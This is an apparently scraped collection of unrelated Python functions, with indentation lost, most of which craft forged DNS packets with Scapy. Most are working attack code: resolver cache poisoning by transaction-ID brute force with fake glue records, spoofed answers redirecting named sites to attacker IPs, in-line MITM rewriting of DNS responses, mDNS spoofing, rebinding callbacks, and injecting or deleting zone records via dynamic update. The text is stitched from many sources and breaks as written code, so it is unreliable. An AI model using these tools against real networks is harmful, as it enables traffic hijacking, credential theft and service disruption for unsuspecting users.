def spoofDNS():
dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# print("Sub Domain", SUB_DOMAIN)
Qdsec = DNSQR(qname=SUB_DOMAIN)
Anssec = DNSRR(rrname=SUB_DOMAIN, type='A', rdata=SPROOF_ADDR, ttl=68900)
dns = DNS(id=getRandomTXID(),
aa=1,
rd=0,
qr=1,
qdcount=1,
ancount=1,
nscount=2,
arcount=0,
qd=Qdsec,
an=Anssec,
ns=DNSRR(rrname=b'example.com', rdata=SPROOF_NS_1, type='NS') /
DNSRR(rrname=b"example.com", type='NS', rdata=SPROOF_NS_2))
response = dns
response.getlayer(DNS).qd.qname = SUB_DOMAIN
for _ in range(125):
# Set random TXID from 0 to 255
response.getlayer(DNS).id = getRandomTXID()
sendPacket(dns_sock, response, DNS_ADDR, my_query_port)
dns_sock.close()
def craft_and_send(pkt,
dns_type,
segment=None,
is_hb=False,
real_response=None):
"""
Craft a spoofed dns response and send it.
"""
spf_ip = IP(dst=pkt[IP].src)
spf_udp = UDP(dport=pkt[UDP].sport, sport=53)
if real_response:
spf_resp = spf_ip / spf_udp / real_response[DNS]
else:
spf_dnsqr = DNSQR(qname=pkt[DNSQR].qname, qtype=dns_type)
spf_dnsrr = DNSRR(rrname=pkt[DNSQR].qname, ttl=232, type=dns_type)
if segment:
spf_dnsrr.rdata = segment
if is_hb:
global hb_ip
spf_dnsrr.rdata = hb_ip
spf_dns = DNS(qr=1, id=pkt[DNS].id, qd=spf_dnsqr, an=spf_dnsrr)
spf_resp = spf_ip / spf_udp / spf_dns
global iface
send(spf_resp, verbose=0, iface=iface)
def dnsSpoof(pkt):
if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP):
sendp(pkt, verbose=False)
else:
if (globalargs.randomSubdomain
in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP):
# return the response to the victim (it will think its from the authoritative DNS)
spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \
ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \
ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl))
send(spoof_pkt, verbose=False)
print ccolors.OKGREEN + "Victim DNS poisoned...\n" + ccolors.NC
elif (globalargs.randomSubdomain
in pkt[DNS].qd.qname) and (pkt[IP].dst
== globalargs.addressToForge):
spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \
DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \
an=DNSRR(rrname=pkt[DNS].qd.qname, type="A", rdata="123.123.123.123"))
send(spoof_pkt, verbose=False)
print ccolors.OKGREEN + "Attack successful!\n" + ccolors.NC + ccolors.WARNING + "Terminating..." + ccolors.NC
sys.exit()
def test_addrlen_too_large(child):
server.listen(DNS(qr=1, qdcount=TEST_QDCOUNT, ancount=TEST_ANCOUNT,
qd=(DNSQR(qname=TEST_NAME, qtype=DNS_RR_TYPE_AAAA) /
DNSQR(qname=TEST_NAME, qtype=DNS_RR_TYPE_A)),
an=(DNSRR(rrname=TEST_NAME, type=DNS_RR_TYPE_AAAA,
rdlen=18549, rdata=TEST_AAAA_DATA) /
DNSRR(rrname=TEST_NAME, type=DNS_RR_TYPE_A,
rdlen=DNS_RR_TYPE_A_DLEN, rdata=TEST_A_DATA))))
assert(not successful_dns_request(child, TEST_NAME, TEST_AAAA_DATA))
def handle_packet(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
pkt_udp = self._pkt.get_protocols(udp.udp)
dns = DNS(self._pkt[-1])
cs = self._controller.get_customers()
for c in range(len(cs)):
if IPAddress(pkt_ip.src) in IPNetwork(
cs[c].get_private_ip_subnet()):
index = c
#print'---##################INEX#############',index
#self._controller.set_current_customer_id(index)
#index=self._controller.get_current_customer_id()
if pkt_udp is not None and self._pport is not None:
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='10:00:00:00:10:ff',
dst=cs[index].get_next_hop_mac()))
new_pkt.add_protocol(
ipv4.ipv4(src='10.1.0.18',
dst=cs[index].get_name_server(),
proto=17))
#print '********index********',pkt_udp,'*******PORT********',self._pport,'######################'
new_pkt.add_protocol(udp.udp(src_port=53, dst_port=self._pport))
#print'---pkt is created---til udp'
#new_dns=DNS(rd=0,id=pkt_dns.id,qd=DNSQR(qname=pkt_dns.qd.qname),ns=DNSRR(rrname=pkt_dns.ar.rrname,type=1,ttl=60000,rdata=cs[index].get_name_server()))
dns = DNS(rd=0,
id=dns.id,
qr=1L,
qd=dns.qd,
ancount=1,
nscount=1,
arcount=1,
an=(DNSRR(rrname='ROOT-SERVER.',
type='A',
rclass='IN',
ttl=60000,
rdata='10.1.0.18')),
ns=(DNSRR(rrname='ROOT-SERVER.',
type='NS',
rclass='IN',
ttl=3600,
rdata='.')),
ar=DNSRR(rrname='ROOT-SERVER.',
type='A',
rclass='IN',
ttl=60000,
rdata='10.1.0.18'))
#print('---DNS fo . SENT----',dns)
new_pkt.add_protocol(dns)
new_pkt.serialize()
self.send_dns_packet(new_pkt, cs[index].get_datapath(),
cs[index].get_ingress_port())
self._pport = None
def get_response(pkt):
if DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0:
if "student.pwr.edu.pl" in str(pkt["DNS Question Record"].qname):
spf_resp = IP(src=pkt[IP].dst, dst=pkt[IP].src) /\
UDP(dport=pkt[UDP].sport, sport=53) / \
DNS(id=pkt[DNS].id, ancount=1, qr=1,
an=DNSRR(rrname=pkt[DNSQR].qname, rdata=DNS_SERVER_IP, type=pkt[DNSQR].qtype) /
DNSRR(rrname="student.pwr.edu.pl", rdata=DNS_SERVER_IP))
send(spf_resp, iface=IFACE)
return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def loud(args):
poisoned = False
# first packet sent to the victim NS to start the recursive domain to ip resolution
reqPkt = IP(dst=args.victim) / UDP(sport=53) / DNS(qr=0,
qd=DNSQR(qname=""))
# authoritative record
realNSRR = DNSRR(rrname=args.targetDomain,
type='NS',
rdata=args.soaDomain[0],
ttl=args.ttl)
# fake additional record (glue)
fakeARR = DNSRR(rrname=args.soaDomain[0],
type='A',
rdata=args.addressToForge,
ttl=args.ttl)
amount = 5
resPkts = list()
for x in xrange(0, amount - 1):
resPkts.append(
IP(dst=args.victim) / UDP(sport=53, dport=54) /
DNS(aa=1, qr=1, qd=DNSQR(qname=""), ns=realNSRR, ar=fakeARR))
while not poisoned:
# generate random subdomain, i.e. 1234www5678.example.com
queryDomain = utils.getRandomSubdomain() + args.targetDomain
for x in xrange(0, amount - 1):
resPkts[x][DNS].id = utils.getRandomTXID()
resPkts[x][DNS].qd.qname = queryDomain
reqPkt[DNS].qd.qname = queryDomain
send(reqPkt, verbose=False)
for x in xrange(0, amount - 1):
send(resPkts[x], verbose=False)
# ask the victim for the IP of the domain we are trying to spoof
pkt = sr1(IP(dst=args.victim) / UDP(sport=53) /
DNS(qr=0, qd=DNSQR(qname=args.soaDomain[0], qtype='A')),
verbose=False)
if pkt[DNS].an and pkt[DNS].an.rdata:
actualAnswer = str(pkt[DNS].an.rdata)
# if the IP is our IP, we poisoned the victim
if actualAnswer == args.addressToForge:
poisoned = True
print ccolors.OKGREEN + 'Poisoned now!\n' + ccolors.NC
deltaTime = datetime.datetime.now() - args.startTime
print ccolors.WARNING + 'It took: ' + str(deltaTime) + ccolors.NC
def get_response(pkt: IP):
print("XD")
if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
print("XD")
if page_name in str(pkt["DNS Question Record"].qname):
spf_resp = IP(dst=pkt[IP].src) / UDP(
dport=pkt[UDP].sport, sport=53) / DNS(
id=pkt[DNS].id,
ancount=1,
an=DNSRR(rrname=pkt[DNSQR].qname, rdata=FAKE_IP) /
DNSRR(rrname=page_name, rdata=FAKE_IP))
spf_resp.show()
send(spf_resp, verbose=0, iface=IFACE)
return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def dns_callback(pkt):
if DNS in pkt and not UDPerror in pkt:
global first_request
global dns_id
ip = pkt.getlayer(IP)
dns = pkt.getlayer(DNS)
if dns.qr:
return dns.summary()
else:
if dns.qd != None and dns_id != dns.id:
if confusion in dns.qd.qname:
dns_id = dns.id
answer = IP(dst=ip.src, src=ip.dst) / UDP(
dport=ip.sport, sport=ip.dport) / DNS(
id=dns.id,
qr=1,
qd=dns.qd,
an=DNSRR(rrname=dns.qd.qname,
type="CNAME",
ttl=dns_ttl,
rdata=attacker) /
DNSRR(rrname=attacker, ttl=dns_ttl, rdata=victim))
send(answer, loop=0)
return dns.summary()
elif attacker in dns.qd.qname:
dns_id = dns.id
answer = IP(dst=ip.src, src=ip.dst) / UDP(
dport=ip.sport, sport=ip.dport
) / DNS(
id=dns.id,
qr=1,
qd=dns.qd,
an=DNSRR(rrname=dns.qd.qname,
ttl=dns_ttl,
rdata=attacker_ip) /
DNSRR(rrname=dns.qd.qname, ttl=dns_ttl, rdata=victim))
send(answer, loop=0)
return dns.summary()
def dns_callback(pkt):
if DNS in pkt and not UDPerror in pkt:
global first_request
global dns_id
ip = pkt.getlayer(IP)
dns = pkt.getlayer(DNS)
if dns.qr:
return dns.summary()
else:
if dns.qd != None and attacker in dns.qd.qname:
if dns_id != dns.id:
dns_id = dns.id
ip_answer = attacker_ip if first_request else victim
if first_request:
first_request = False
answer = IP(dst=ip.src, src=ip.dst) / UDP(
dport=ip.sport, sport=ip.dport) / DNS(
id=dns.id,
qr=1,
qd=dns.qd,
an=DNSRR(rrname=dns.qd.qname,
ttl=dns_ttl,
rdata=ip_answer))
send(answer, loop=0)
return dns.summary()
def forge_packet(self, pkt, rdata="", rcode=0):
d = pkt[IP].src
dp = pkt[UDP].sport
id = pkt[DNS].id
q = pkt[DNS].qd
t = pkt[DNSQR].qtype
if t == TXT:
# if scapy is patched:
# rdata = txtfy(rdata)
for i in range(0, len(rdata), 0xff + 1):
rdata = rdata[:i] + chr(len(rdata[i:i + 0xff])) + rdata[i:]
an = (None, DNSRR(rrname=self.dn, type=t, rdata=rdata,
ttl=60))[rcode == 0]
ns = DNSRR(rrname=self.dn, type="NS", ttl=3600, rdata="ns." + self.dn)
return IP(dst=d) / UDP(dport=dp) / DNS(
id=id, qr=1, rd=1, ra=1, rcode=rcode, qd=q, an=an, ns=ns)
def __decodeRR(self, name, s, p):
ret = s[p:p + 10]
type, cls, ttl, rdlen = unpack("!HHIH", ret)
p += 10
rr = None
if type == 15:
rr = DNSMXRR("\x00" + ret + s[p:p + rdlen])
rr.rdata = DNSgetstr(s, p + 2)[0]
rr.rdlen = rdlen
elif type == 6:
rr = DNSSOARR("\x00" + ret + s[p:p + rdlen])
rr.mname, q = DNSgetstr(s, p)
rr.rname, q = DNSgetstr(s, q)
rr.serial, rr.refresh, rr.retry, rr.expire, rr.minimum = unpack(
'!IIIII', s[q:q + 20])
rr.rdlen = rdlen
else:
rr = DNSRR("\x00" + ret + s[p:p + rdlen])
if 2 <= rr.type <= 5:
rr.rdata = DNSgetstr(s, p)[0]
del rr.rdlen
p += rdlen
rr.rrname = name
return rr, p
def main():
mode = sys.argv[1] if len(sys.argv) > 1 else "none"
if not mode in ["fakenx", "fake"]:
print >> sys.stderr, 'Please supply argv[1] in ["fakenx", "fake"]'
return 1
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind((BIND_TO, 53))
while 1:
data, addr = udps.recvfrom(1024)
p = DNS(data)
rp = DNS(id=p.id, qr=1, qdcount=p.qdcount)
rp.qd = p[DNSQR]
if p.opcode == 0:
rp.ancount = 1
rp.rcode = 0
answer_ip = ANSWER_WITH
if mode == "fakenx": answer_ip = resolve_or_fake(p.qd[0].qname)
rp.an = DNSRR(rrname=p.qd[0].qname,
ttl=60,
rdlen=4,
rdata=answer_ip)
print " - Responding to {0} with {1}.".format(
p.qd[0].qname, answer_ip)
else:
rp.ancount = 0
rp.rcode = 2
print " ! Query opcode {0}, answering servfail.".format(p.opcode)
udps.sendto(rp.build(), addr)
def dns_poison(pkt):
# return if the packet does not have a DNS layer
if not pkt.haslayer(DNSQR): return
qd = pkt[DNS].qd
# return if not a dns query or does not have a qtype of "A"
if pkt[DNS].qr != 0 or qd.qtype != 1: return
# dns answer with spoofed ip
dns_an = DNSRR(rrname=qd.qname, type="A", ttl=30, rdata=poison_ip)
sendp(
Ether() / # empty Ether packet makes it work (idk why?)
IP(src=pkt[IP].dst, dst=pkt[IP].src) / # switch IP src and dst
UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)
/ # switch udp sport and dport
DNS(id=pkt[DNS].id,
qr=1,
aa=1,
ad=1,
ra=0,
an=dns_an,
ancount=1,
qd=qd), # spoofed dns packet
iface=interface,
verbose=0)
def modify(packet):
pkt = IP(packet.get_payload())
if pkt.qd.qname == b'facebook.com.':
print(pkt.show())
p = Ether(
dst=self.MacList[0], src=self.LocalMac,
type=2048) / IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP(
sport=53, dport=pkt[UDP].sport) / DNS(
id=pkt[DNS].id,
qr=1,
qdcount=1,
ancount=1,
nscount=0,
arcount=0,
qd=DNSQR(
qname=pkt[DNS].qd.qname, qtype=1, qclass=1),
an=DNSRR(rrname=pkt[DNS].qd.qname,
type=1,
rclass=1,
rdata=ip),
ns=None,
ar=None)
sendp(p, verbose=0)
#packet.set_payload(bytes(str(pkt), 'utf-8')) #set the packet content to our modified version
packet.drop() #drop the packet
else:
packet.accept()
def process_packet(self, packet):
"""
Determines how to process each packet in queue.
Parses for those with DNS response, modifies response
such that target_url resolves to the redirect_ip.
"""
# wrap payload packet in Scapy IP layer
scapy_packet_obj = IP(packet.get_payload())
if (scapy_packet_obj.haslayer(DNSRR)):
q_name = scapy_packet_obj[DNSQR].qname
if (self.target_url in q_name):
print("[+] Resolving to provided IP...")
manufactured_res = DNSRR(rrname=q_name, rdata=self.redirect_ip)
scapy_packet_obj[
DNS].an = manufactured_res # supplant DNS answer
scapy_packet_obj[
DNS].ancount = 1 # consolidate DNS answers to 1
# CRITICAL: scapy will autogen correct len + checksum contingent on new data
del scapy_packet_obj[IP].len
del scapy_packet_obj[IP].chksum
del scapy_packet_obj[UDP].len
del scapy_packet_obj[UDP].chksum
# distill into original packet obj
packet.set_payload(str(scapy_packet_obj))
packet.accept()
def craft_MDNS_IPv6(self, packet: Packet) -> Packet:
"""
This function crafts a MDNS-IPv6 packet.
"""
name = packet[DNSQR].qname
return (
[
IPv6(dst=self.multicast_v6) / UDP(sport=5353, dport=5353) /
DNS(
qr=1,
aa=1,
rd=0,
ancount=self.ipv6_number,
an=self.craft_DNSv6_response(name),
),
IPv6(dst=self.multicast_v6) / UDP(sport=5353, dport=5353) /
DNS(
qr=1,
aa=1,
rd=0,
ancount=1,
an=DNSRR(ttl=30, rrname=name, rdata=self.ip),
),
],
packet[IPv6].src,
name,
"DNS",
)
def handle_socket_msg(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
pkt_udp = self._pkt.get_protocols(udp.udp)[0]
pkt_dns = DNS(self._pkt[-1])
print('----------------Sent query with ID', pkt_dns.id, pkt_dns)
if pkt_udp.dst_port == 53 or pkt_udp.src_port == 53:
#print 'A DNS query for controller is received'
if pkt_dns:
cs = self._controller.get_customers()
d_mac = cs[0].get_next_hop_mac()
pkt_dns.qr = 0
new_pkt = packet.Packet()
e = ethernet.ethernet(dst=cs[0].get_next_hop_mac(),
src=pkt_eth.src)
new_pkt.add_protocol(e)
new_pkt.add_protocol(
ipv4.ipv4(src=self._controller.get_ip(),
dst=cs[0].get_name_server(),
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=pkt_udp.dst_port,
dst_port=pkt_udp.src_port))
new_dns = DNS(rd=0,
id=pkt_dns.id,
qd=DNSQR(qname=pkt_dns.qd.qname),
ns=DNSRR(rrname=pkt_dns.ar.rrname,
type=1,
ttl=60000,
rdata=cs[0].get_name_server()))
new_pkt.add_protocol(new_dns)
new_pkt.serialize()
self.send_dns_packet(new_pkt, cs[0].get_datapath(),
cs[0].get_ingress_port())
def add_a_record(name_server, new_dns_record, ip_value):
os.system('clear')
title()
# Verifying all required options have a populated value
if name_server is None or new_dns_record is None or ip_value is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record injection..."
print "[*] Sending DNS packet adding " + new_dns_record
print "[*] and pointing it to " + ip_value + "\n"
dns_zone = new_dns_record[new_dns_record.find(".") + 1:]
# Craft the packet with scapy
add_packet = sr1(
IP(dst=name_server) / UDP() /
DNS(opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[
DNSRR(rrname=new_dns_record, type="A", ttl=120, rdata=ip_value)
]))
print add_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def test_from_datasources():
packets_1 = [
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com")
]
packets_2 = [
# HTTP Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com"),
# DNS Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) /
DNS(rd=1,
qd=DNSQR(qtype="A", qname="google.com"),
an=DNSRR(rdata="123.0.0.1")),
# TCP Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=80, dport=5355),
]
nx = NetworkX.from_datasources([
packets_to_datasource_events(packets)
for packets in [packets_1, packets_2]
])
# Make the graph
nx.graph()
assert not nx.is_empty()
def delete_dns_record(del_ns, del_record):
os.system('clear')
title()
# Verifying all required options have a populated value
if del_ns is None or del_record is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record deletion..."
print "[*] Sending packet which deletes the following record: "
print "[*] " + del_record + "\n"
dns_zone = del_record[del_record.find(".") + 1:]
del_packet = sr1(
IP(dst=del_ns) / UDP() / DNS(opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[
DNSRR(rrname=del_record,
type="ALL",
rclass="ANY",
ttl=0,
rdata="")
]))
print del_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def spoof_dns_response(orig_pkt, spoof_ip, iface):
"""
Summary: This method responds to DNS Query by spoofing and can be utilized for
Man In The Middle(MITM) attack.
"""
print(f"Spoofing: {orig_pkt[DNSQR].qname.decode('UTF-8')}")
try:
# Construct DNS response with following modifications
# qr: 1 --> response
# ra: 1 --> recursion available
# ancount:1 --> count of answers provided
# an --> Spoofed DNS answer with dummy fixed ttl and IP
dns_resp = DNS(id=orig_pkt[DNS].id,
qr=1,
ra=1,
ancount=1,
qdcount=orig_pkt[DNS].qdcount,
qd=orig_pkt[DNS].qd,
an=DNSRR(rrname=orig_pkt[DNSQR].qname,
rdata=spoof_ip,
ttl=DNS_TTL))
resp_pkt = IP(dst=orig_pkt[IP].src, src=orig_pkt[IP].dst) / UDP(
dport=orig_pkt[UDP].sport, sport=53) / DNS()
resp_pkt[DNS] = dns_resp
# Sending DNS response
send(resp_pkt, verbose=0, iface=iface)
return f"Spoofed DNS Response Sent: {orig_pkt[IP].src}"
except Exception as err:
raise err
def buildp(self, dnsp, payload=None): n = DNS(id=dnsp.id,qr=1,opcode=0,aa=1,tc=0,rd=dnsp.rd,ra=0,qdcount=dnsp.qdcount,nscount=0,arcount=0,qd=dnsp.qd) if payload: a = DNSRR(rrname=dnsp.qd.qname,type=1,rclass=1,ttl=60,rdlen=4,rdata=payload) n.an = a n.ancount = 1 return n
def main():
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind((BIND_TO, 53))
while 1:
data, addr = udps.recvfrom(1024)
p = DNS(data)
rp = DNS(id=p.id, qr=1, qdcount=p.qdcount)
rp.qd = p[DNSQR]
if p.opcode == 0:
rp.ancount = 1
rp.rcode = 0
answer_ip = resolve_or_fake(p.qd[0].qname)
rp.an = DNSRR(rrname=p.qd[0].qname,
ttl=60,
rdlen=4,
rdata=answer_ip)
print " - Responding to {0} with {1}.".format(
p.qd[0].qname, answer_ip)
else:
# servfail
rp.ancount = 0
rp.rcode = 2
print " ! Query opcode {0}, answering servfail.".format(p.opcode)
udps.sendto(rp.build(), addr)
def manipulate(self, package):
pkt = IP(package.get_payload())
udp = pkt.getlayer(DNSRR)
qname = pkt[DNSQR].qname
type_id = pkt[DNSQR].qtype
if (type_id == self.reg_a):
new_ip = self.ipv4
elif (type_id == self.reg_aaaa):
new_ip = self.ipv6
try:
# Read dns name
ip = pkt[DNS][2].rdata
# Set new spoofed dns record
pkt[DNS].an = DNSRR(rrname=qname, type=type_id, rdata=new_ip)
# Set 1 record in the response
pkt[DNS].ancount = 1
# Delete checksum and length
del pkt.chksum
del pkt.len
del pkt[UDP].chksum
del pkt[UDP].len
self.log("---------------------------------")
self.log("[*] DNS query:")
self.log("---------------------------------")
self.log("\tName: " + qname + " : " + ip + " -> " + new_ip)
package.set_payload(bytes(pkt))
except Exception as e:
#print(e)
pass
#print(package)
package.accept()
def modify_packet(packet):
qname = packet[DNSQR].qname
qname = qname.decode()
qtype = qtype_(packet)
rule, ip = _makeDecision(qname)
if rule != "":
_success(f"'{GREEN}{packet[IP].dst}{WHITE}' Querying {WHITE}'{GREEN}{qtype}{WHITE}' record ,{WHITE}'{GREEN}{qname}{WHITE}', {CYAN}redtirect{WHITE} to{CYAN} → {WHITE}'{GREEN}{ip}{WHITE}'.")
packet[DNS].an = DNSRR(rrname=qname, rdata=ip)
else:
_ignore(f"'{BLUE}{packet[IP].dst}{WHITE}' Querying {WHITE}'{YELLOW}{qtype}{WHITE}' record , {WHITE}'{YELLOW}{qname}{WHITE}', ignoring...")
packet[DNS].an = DNSRR(rrname=qname, rdata=packet[DNSRR].rdata)
packet[DNS].ancount = 1
del packet[IP].len
del packet[IP].chksum
del packet[UDP].len
del packet[UDP].chksum
return packet
def get_response(pkt: IP):
if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
if "www.google123.com" in str(pkt["DNS Question Record"].qname):
spf_resp = IP(dst=pkt[IP].src) / UDP(
dport=pkt[UDP].sport, sport=53) / DNS(
id=pkt[DNS].id,
rcode=0,
ancount=1,
an=DNSRR(rrname=pkt[DNSQR].qname, rdata=local_ip) /
DNSRR(rrname="www.google123.com", rdata=local_ip))
print(spf_resp[DNS].show())
send(spf_resp, verbose=0, iface=IFACE)
return f"Spoofed DNS Response Sent: {pkt[IP].src}"
else:
# make DNS query, capturing the answer and send the answer
return forward_dns(pkt)
def auth(self, dnsp, a):
challenge = randtok()
self.pendingauth = (dnsp.qd.qname[:dnsp.qd.qname.find('.auth.dyn')], challenge)
ad = DNSRR(rrname='challenge.dyn.ctf.itsec.', type=5, rclass=1,
ttl=60, rdata = challenge)
a.ar = ad
a.arcount = 1
self.send(a.build())
def parse(s):
if 'Standard query response' not in s:
args = s.split()
print(args)
tmp = int(args[9], 16)
transaction_id = hex(tmp)
print(transaction_id)
pkt = (IP(src='192.168.1.1', dst='192.168.1.100')
/ UDP(sport=53, dport=4673)
/ DNS(id=int(tmp), qr=1, nscount=1, an=None, arcount=1,
qd=DNSQR(qname=args[11]),
ns=(DNSRR(rrname=args[11], type='NS', ttl=36000, rdata='args[11]')),
ar=(DNSRR(rrname=args[11], type="A", ttl=36000, rdata='127.0.0.1'))))
send(pkt)
print("### Packet sent ###")
def calculate_limit_size(self, pkt):
s = self.pkt_max_size - len(
pkt[DNS]) - 2 * len(DNSRR()) - 3 * len(self.dn) - len("ns.") - 10
if pkt[DNSQR].qtype == TXT:
max_size = 512
s -= len(str(s))
else:
max_size = self.qname_max_size
return min((s, 1)[s < 1], max_size)